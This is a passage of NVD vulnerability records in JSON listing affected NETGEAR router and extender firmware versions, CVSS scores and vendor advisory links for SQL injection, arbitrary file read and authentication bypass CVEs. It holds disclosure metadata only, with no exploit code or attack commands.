"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3139F80C-6E20-471E-B1AE-66022D411460",
"versionEndExcluding": "1.0.3.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0F859165-8D89-4CDD-9D48-9C7923D2261F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEFCBDB9-47D0-40EF-9428-FF714763BC12",
"versionEndExcluding": "1.0.3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD376891-1FB6-48B7-A4B3-C3C2C6E92C39",
"versionEndExcluding": "1.0.2.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "832B6460-9984-4441-8E06-F784052FC8CC",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "EC5B6CB8-D439-42D5-ACAE-6246874EA5F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EF96C0EB-8CB6-4C86-A9A2-A4C7AF58C97F",
"versionEndExcluding": "1.0.2.98",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "D99E146D-B278-4CA6-8156-7D9923015779",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94398B78-9F11-4AD2-A518-3A81CDD72E88",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "68F195E4-0A6D-400B-8F48-3EA07DC3A3ED",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by SQL injection. This affects D3600 before 1.0.0.68, D6000 before 1.0.0.68, D6200 before 1.1.00.28, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DC112A before 1.0.0.40, EX8000 before 1.0.0.118, JR6150 before 1.0.1.18, R6050 before 1.0.1.18, R6220 before 1.1.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6700v2 before 1.2.0.16, R6800 before 1.2.0.16, R6900v2 before 1.2.0.16, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500 before 1.0.0.118, R7500v2 before 1.0.3.26, R7800 before 1.0.2.40, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.6, R9000 before 1.0.3.10, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.56, and WNDR4500v3 before 1.0.0.56."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una inyecci\u00f3n SQL. Esto afecta a D3600 versiones anteriores a 1.0.0.68, D6000 versiones anteriores a 1.0.0.68, D6200 versiones anteriores a 1.1.00.28, D6220 versiones anteriores a 1.0.0.40, D6400 versiones anteriores a 1.0.0. 74, D7000 versiones anteriores a 1.0.1.60, D7000v2 versiones anteriores a 1.0.0.74, D7800 versiones anteriores a 1.0.1.34, D8500 versiones anteriores a 1.0.3.39, DC112A versiones anteriores a 1.0.0.40, EX8000 versiones anteriores a 1.0.0. 118, JR6150 versiones anteriores a 1.0.1.18, R6050 versiones anteriores a 1.0.1.18, R6220 versiones anteriores a 1.1.0.66, R6250 versiones anteriores a 1.0.4.26, R6300v2 versiones anteriores a 1.0.4.24, R6400 versiones anteriores a 1.0. 1.36, R6400v2 versiones anteriores a 1.0.2.52, R6700 versiones anteriores a 1.0.1.44, R6700v2 versiones anteriores a 1.2.0.16, R6800 versiones anteriores a 1.2.0.16, R6900v2 versiones anteriores a 1.2.0.16, R6900 versiones anteriores a 1. 0.1.44, R7000 versiones anteriores a 1.0.9.26, R6900P versiones anteriores a 1.3.0.20, R7000P versiones anteriores a 1.3.0.20, R7100LG versiones anteriores a 1.0.0.40, R7300DST versiones anteriores a 1.0.0. 62, R7500 versiones anteriores a 1.0.0.118, R7500v2 versiones anteriores a 1.0.3.26, R7800 versiones anteriores a 1.0.2.40, R7900 versiones anteriores a 1.0.2.10, R8000 versiones anteriores a 1.0.4.12, R7900P versiones anteriores a 1.3. 0.10, R8000P versiones anteriores a 1.3.0.10, R8300 versiones anteriores a 1.0.2.116, R8500 versiones anteriores a 1.0.2.116, R8900 versiones anteriores a 1.0.3.6, R9000 versiones anteriores a 1.0.3.10, WNDR3700v4 versiones anteriores a 1. 0.2.102, WNDR3700v5 versiones anteriores a 1.1.0.54, WNDR4300v1 versiones anteriores a 1.0.2.98, WNDR4300v2 versiones anteriores a 1.0.0.56, y WNDR4500v3 versiones anteriores a 1.0.0.56."
}
],
"id": "CVE-2019-20730",
"lastModified": "2024-11-21T04:39:12.447",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T20:15:13.337",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061197/Security-Advisory-for-SQL-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-3056"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061197/Security-Advisory-for-SQL-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-3056"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-22 17:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.94.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | ex3700_firmware | * | |
| netgear | ex3700 | - | |
| netgear | ex3800_firmware | * | |
| netgear | ex3800 | - | |
| netgear | ex6120_firmware | * | |
| netgear | ex6120 | - | |
| netgear | ex6130_firmware | * | |
| netgear | ex6130 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B79CB764-3B62-4C39-9B68-A7C949EA91BE",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C578B9-6D52-492F-854F-067EB36F84B1",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2AC81E61-E8CD-4929-A1E2-C1B620BCC3E7",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0EF0C67F-9F79-4D2D-9453-824697828403",
"versionEndExcluding": "1.0.0.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E43DA92A-E429-459F-8B34-DDED55F5590B",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC332E60-A7DB-41C5-B1ED-FE3EDF83F8BC",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24E4CE14-4FC5-4F73-BFC8-F0B0D924F788",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "819CC65F-F5DA-4620-BC68-CAAA2B73195D",
"versionEndExcluding": "1.0.9.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "02C2BB4F-8FBB-47BF-A05F-72DDC2D0A31B",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "59C6F6E4-C411-486E-BDBF-75F0ABEF5112",
"versionEndExcluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B9FA153F-24E0-47DE-94B4-10F51999BCF0",
"versionEndExcluding": "1.0.3.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58EFB06D-AD59-4F40-B6EC-BD3C1BCACE7A",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.94."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una capacidad del atacante para leer archivos arbitrarios. Esto afecta a EX3700 versiones anteriores a 1.0.0.64, EX3800 versiones anteriores a 1.0.0.64, EX6120 versiones anteriores a 1.0.0.32, EX6130 versiones anteriores a 1.0.0.16, R6300v2 versiones anteriores a 1.0.4.12, R6700 versiones anteriores a 1.0.1.26, R6900 versiones anteriores a 1.0.1.22, R7000 versiones anteriores a 1.0.9.6, R7300DST versiones anteriores a 1.0.0.52, R7900 versiones anteriores a 1.0.1.12, R8000 versiones anteriores a 1.0.3.24 y R8500 versiones anteriores a 1.0.2.94."
}
],
"id": "CVE-2017-18752",
"lastModified": "2024-11-21T03:20:50.170",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T17:15:11.510",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051502/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Extenders-PSV-2017-0319"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051502/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Extenders-PSV-2017-0319"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-22 15:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by authentication bypass. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, R8500 before 1.0.2.74, and WNR2000v2 before 1.2.0.8.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | ex3700_firmware | * | |
| netgear | ex3700 | - | |
| netgear | ex3800_firmware | * | |
| netgear | ex3800 | - | |
| netgear | ex6120_firmware | * | |
| netgear | ex6120 | - | |
| netgear | ex6130_firmware | * | |
| netgear | ex6130 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | wnr2000_firmware | * | |
| netgear | wnr2000 | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B79CB764-3B62-4C39-9B68-A7C949EA91BE",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C578B9-6D52-492F-854F-067EB36F84B1",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2AC81E61-E8CD-4929-A1E2-C1B620BCC3E7",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0EF0C67F-9F79-4D2D-9453-824697828403",
"versionEndExcluding": "1.0.0.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E43DA92A-E429-459F-8B34-DDED55F5590B",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC332E60-A7DB-41C5-B1ED-FE3EDF83F8BC",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24E4CE14-4FC5-4F73-BFC8-F0B0D924F788",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "819CC65F-F5DA-4620-BC68-CAAA2B73195D",
"versionEndExcluding": "1.0.9.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "02C2BB4F-8FBB-47BF-A05F-72DDC2D0A31B",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
